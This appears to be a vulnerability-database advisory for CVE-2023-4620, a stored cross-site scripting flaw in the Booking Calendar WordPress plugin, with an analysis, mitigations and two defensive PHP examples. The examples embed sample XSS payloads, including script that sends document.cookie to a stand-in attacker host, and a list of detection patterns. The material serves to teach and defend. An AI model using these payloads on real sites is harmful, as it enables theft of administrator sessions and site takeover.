
CVE-2023-4620: CWE-79 Cross-Site Scripting (XSS) in Unknown Booking Calendar

Medium
Published: Mon Oct 16 2023 (10/16/2023, 08:32:45 UTC)
Source: CVE
Vendor/Project: Unknown
Product: Booking Calendar

Description

The Booking Calendar WordPress plugin before 9.7.3.1 does not sanitize and escape some of its booking form data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against administrators.

AI-Powered Analysis

AI analysis last updated: 06/26/2025, 02:16:53 UTC

Technical Analysis

CVE-2023-4620 is a medium-severity stored cross-site scripting vulnerability (XSS, CWE-79) in the Booking Calendar WordPress plugin in versions before 9.7.3.1. The plugin neither sanitizes some booking form fields on input nor escapes them on output, so an unauthenticated visitor who submits a booking can place HTML or script in those fields; the content is stored and later rendered unescaped in the plugin's administrative pages. When an administrator views the affected booking entries, the injected script runs in the administrator's browser, inside the site's origin and with the administrator's session, and can read page content, submit requests on the administrator's behalf (anything the dashboard allows), or attempt to capture credentials. No authentication is needed to plant the payload, but exploitation requires an administrator to open the booking view, which is routine administrative activity rather than a meaningful barrier.

The CVSS v3.1 base score is 6.1 (medium): network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), user interaction required (UI:R), changed scope (S:C, because the script executes in the administrator's browser, a security authority separate from the vulnerable server-side component), limited confidentiality and integrity impact (C:L/I:L) and no availability impact (A:N). No exploitation in the wild had been reported at the time of this analysis. The plugin is widely used for booking and reservation management on WordPress sites, which makes it a plausible target for attackers seeking administrative access or a place to inject content into a site. Although this record carries no patch link, the affected-version range ("before 9.7.3.1") identifies 9.7.3.1 as the fixed release; sites should update to 9.7.3.1 or later.
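The following is an added illustration of the bug class described above, not code from the Booking Calendar plugin: a booking submission stored raw and concatenated into an admin HTML table, next to a hardened version that sanitizes on input and escapes on output with the WordPress helpers (esc_html, esc_attr, sanitize_text_field, sanitize_textarea_field, sanitize_email). The field names, the function names and the polyfills that stand in for the WordPress helpers when the script is run outside WordPress are assumptions.

```php
<?php
// Added illustration (not the Booking Calendar plugin's own code): a booking
// submission stored without sanitization and echoed into an admin table,
// beside the hardened version. Field and function names are assumptions.

// Polyfills so the script runs under plain `php` outside WordPress. Inside
// WordPress these names already exist and the real implementations are used;
// the polyfills approximate them and are not substitutes for the real ones.
if (!function_exists('esc_html')) {
    function esc_html($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str): string {
        // Real WP also strips invalid octets; tags and whitespace runs matter here.
        $str = strip_tags((string) $str);
        return trim((string) preg_replace('/[\r\n\t ]+/', ' ', $str));
    }
}
if (!function_exists('sanitize_textarea_field')) {
    function sanitize_textarea_field($str): string {
        return trim(strip_tags((string) $str));   // keeps newlines, unlike sanitize_text_field
    }
}
if (!function_exists('sanitize_email')) {
    function sanitize_email($email): string {
        $e = filter_var((string) $email, FILTER_VALIDATE_EMAIL);
        return $e === false ? '' : $e;            // real WP strips disallowed characters instead
    }
}

// Constructed booking submission, as an unauthenticated visitor could POST it.
$submission = [
    'name'    => 'Mallory <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'email'   => 'mallory@example.com" onmouseover="alert(1)',
    'comment' => "Please call me.\n<img src=x onerror=alert(document.domain)>",
];

// Before: raw input is stored as-is and concatenated into admin HTML unescaped.
// Whatever the visitor typed becomes markup in the administrator's browser.
function store_booking_vulnerable(array $post): array {
    return $post;
}
function render_booking_row_vulnerable(array $b): string {
    return '<tr><td>' . $b['name'] . '</td>'
         . '<td><a href="mailto:' . $b['email'] . '">' . $b['email'] . '</a></td>'
         . '<td>' . nl2br($b['comment']) . '</td></tr>';
}

// After: sanitize on the way in (defence in depth) and, the part that actually
// closes the bug, escape on the way out for the context each value lands in:
// esc_html for element text, esc_attr for attribute values.
function store_booking_hardened(array $post): array {
    return [
        'name'    => sanitize_text_field($post['name'] ?? ''),
        'email'   => sanitize_email($post['email'] ?? ''),
        'comment' => sanitize_textarea_field($post['comment'] ?? ''),
    ];
}
function render_booking_row_hardened(array $b): string {
    return '<tr><td>' . esc_html($b['name']) . '</td>'
         . '<td><a href="mailto:' . esc_attr($b['email']) . '">' . esc_html($b['email']) . '</a></td>'
         . '<td>' . nl2br(esc_html($b['comment'])) . '</td></tr>';
}

// Output escaping alone neutralizes rows that were stored before the fix:
// the same attacker-controlled row rendered with the hardened renderer is inert.
echo "VULNERABLE:\n", render_booking_row_vulnerable(store_booking_vulnerable($submission)), "\n\n";
echo "HARDENED (sanitized + escaped):\n", render_booking_row_hardened(store_booking_hardened($submission)), "\n\n";
echo "HARDENED RENDER OF OLD UNSANITIZED ROW:\n", render_booking_row_hardened(store_booking_vulnerable($submission)), "\n";
```

Run it with `php example.php` to see the three renderings side by side. The point of the third output is that escaping at render time is what fixes the vulnerability for data already in the database; input sanitization is worth having but cannot be relied on alone, since it does not cover rows stored before the fix or values that reach the page through another path. If a field is meant to carry limited rich text, wp_kses_post is the WordPress tool for that rather than trusting the stored value.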

Potential Impact

For European organizations running the Booking Calendar WordPress plugin, the exposed party is the site administrator who reviews bookings. A successful attack executes attacker-supplied script in the administrator's browser with the administrator's session, which can lead to session hijacking, credential theft, or unauthorized administrative actions such as altering booking data or changing site content. This compromises the integrity of booking data and the confidentiality of administrative credentials. Availability is not directly affected, but loss of administrative control can escalate to compromise of the site and, depending on the hosting setup, the underlying infrastructure. Sectors that depend on online booking (hospitality, travel, event management, healthcare) face reputational damage, GDPR obligations if personal data in the bookings or elsewhere on the site is exposed, and operational disruption. The required user interaction is an administrator opening the bookings view, which is routine and offers little practical protection; combined with the unauthenticated, low-complexity attack vector, the risk remains significant. A compromised site can also serve as a foothold for follow-on attacks, including malware distribution to visitors or lateral movement within the organization's network.

Mitigation Recommendations

1. Update the Booking Calendar plugin to version 9.7.3.1 or later; that release adds the missing sanitization and escaping.
2. Until the update can be applied, add Web Application Firewall (WAF) rules that detect and block typical XSS payloads (script tags, event-handler attributes, javascript: URIs) in booking form submissions. Treat this as a stopgap only: signature-based filtering is routinely bypassed.
3. Restrict access to the WordPress admin area to trusted IP addresses or a VPN. This does not stop the payload from reaching the administrator's browser, but it limits the value of a stolen session cookie, which can then only be replayed from those addresses.
4. Brief administrators on the nature of the issue: a stored XSS payload executes as soon as the bookings list renders, so caution while reading an entry offers little protection. The practical advice is to apply the update before reviewing bookings submitted while the site was unpatched, and to treat any session that has already rendered a suspicious entry as potentially compromised (log out, rotate credentials, check for unexpected administrator accounts or plugins).
5. Audit existing booking records for HTML tags, event-handler attributes and javascript: URIs, and clean or delete matches. The update fixes how the plugin renders old rows, but malicious rows left in the database can still be displayed by exports, e-mail notifications or other integrations that render them differently.
6. Deploy a Content Security Policy (CSP) to limit the impact of any injected script by restricting script sources. Note that the WordPress admin area depends on inline scripts, so a strict policy without 'unsafe-inline' will break the dashboard; nonce- or hash-based allowances are needed if the policy is to cover wp-admin.
7. Monitor web server and WordPress logs for booking form submissions containing markup, and for unusual admin-panel activity (new administrator accounts, plugin installations, changed options) following the viewing of bookings.
8. Consider disabling or restricting booking form fields that accept free-text input until the update is in place.
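As an added example for the audit and monitoring steps above (not code from the plugin or this advisory's source), the script below scans booking rows for markup that has no business in a name, e-mail or comment field and reports what matched, so a human can triage before deleting or re-sanitizing. The row shape, the field names and the sample rows are constructed assumptions; the database fetch for the real table is left to the reader, since the plugin's schema is not given on this page.

```php
<?php
// Added illustration (not the plugin's own code): scan stored booking rows for
// markup typical of stored-XSS payloads. Row shape and field names are
// assumptions; replace $rows with rows fetched from the real booking table.

// Case-insensitive patterns. The first two catch most real injections; the rest
// catch elements and URI schemes commonly used to bypass naive filters.
const SUSPICIOUS_PATTERNS = [
    'script_tag'     => '/<\s*script\b/i',
    'event_handler'  => '/\bon[a-z]+\s*=/i',
    'js_uri'         => '/javascript\s*:/i',
    'active_element' => '/<\s*(img|svg|iframe|object|embed|math|style|link|meta)\b/i',
    'data_uri'       => '/data\s*:\s*text\/html/i',
];

/**
 * Return the rows that contain suspicious markup, with the field and pattern
 * that matched. Values are entity-decoded first so that a payload stored in
 * encoded form (which a later consumer might decode) is still found.
 * Expect some false positives (e.g. a comment containing "on=") and triage by hand.
 */
function find_suspicious_bookings(array $rows, array $fields = ['name', 'email', 'comment']): array {
    $hits = [];
    foreach ($rows as $row) {
        foreach ($fields as $field) {
            $value = html_entity_decode((string) ($row[$field] ?? ''), ENT_QUOTES | ENT_HTML5, 'UTF-8');
            foreach (SUSPICIOUS_PATTERNS as $label => $regex) {
                if (preg_match($regex, $value)) {
                    $hits[] = ['id' => $row['id'], 'field' => $field, 'pattern' => $label, 'value' => $value];
                    break; // one finding per field is enough for triage
                }
            }
        }
    }
    return $hits;
}

// Constructed rows standing in for the plugin's booking table.
$rows = [
    ['id' => 101, 'name' => 'Alice Example',                   'email' => 'alice@example.com', 'comment' => 'Late check-in please'],
    ['id' => 102, 'name' => 'Bob <b>Bold</b>',                 'email' => 'bob@example.com',   'comment' => 'Table for 2'],
    ['id' => 103, 'name' => 'Mallory',                         'email' => 'm@example.com',     'comment' => '<script>fetch("//attacker.example/?c="+document.cookie)</script>'],
    ['id' => 104, 'name' => 'Eve <img src=x onerror=alert(1)>', 'email' => 'eve@example.com',   'comment' => ''],
    ['id' => 105, 'name' => 'Trent',                           'email' => 'trent@example.com', 'comment' => 'Contact: &lt;svg onload=alert(1)&gt;'],
];

// Rows 103, 104 and 105 are reported; 101 and 102 are not (102 carries only a
// harmless <b>, which output escaping handles and which is not in the list above).
foreach (find_suspicious_bookings($rows) as $hit) {
    printf("booking %d field=%s pattern=%s value=%s\n", $hit['id'], $hit['field'], $hit['pattern'], $hit['value']);
}
```

The same patterns serve step 7: run them over incoming booking submissions in your request logging (or as the WAF rule set of step 2) to flag attempts as they arrive, and keep the findings for incident review if an administrator later turns out to have viewed a flagged entry.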


Technical Details

Data Version
5.1
Assigner Short Name
WPScan
Date Reserved
2023-08-30T11:56:05.067Z
Cisa Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9838c4522896dcbebddd

Added to database: 5/21/2025, 9:09:12 AM

Last enriched: 6/26/2025, 2:16:53 AM

Last updated: 7/28/2025, 9:34:03 PM

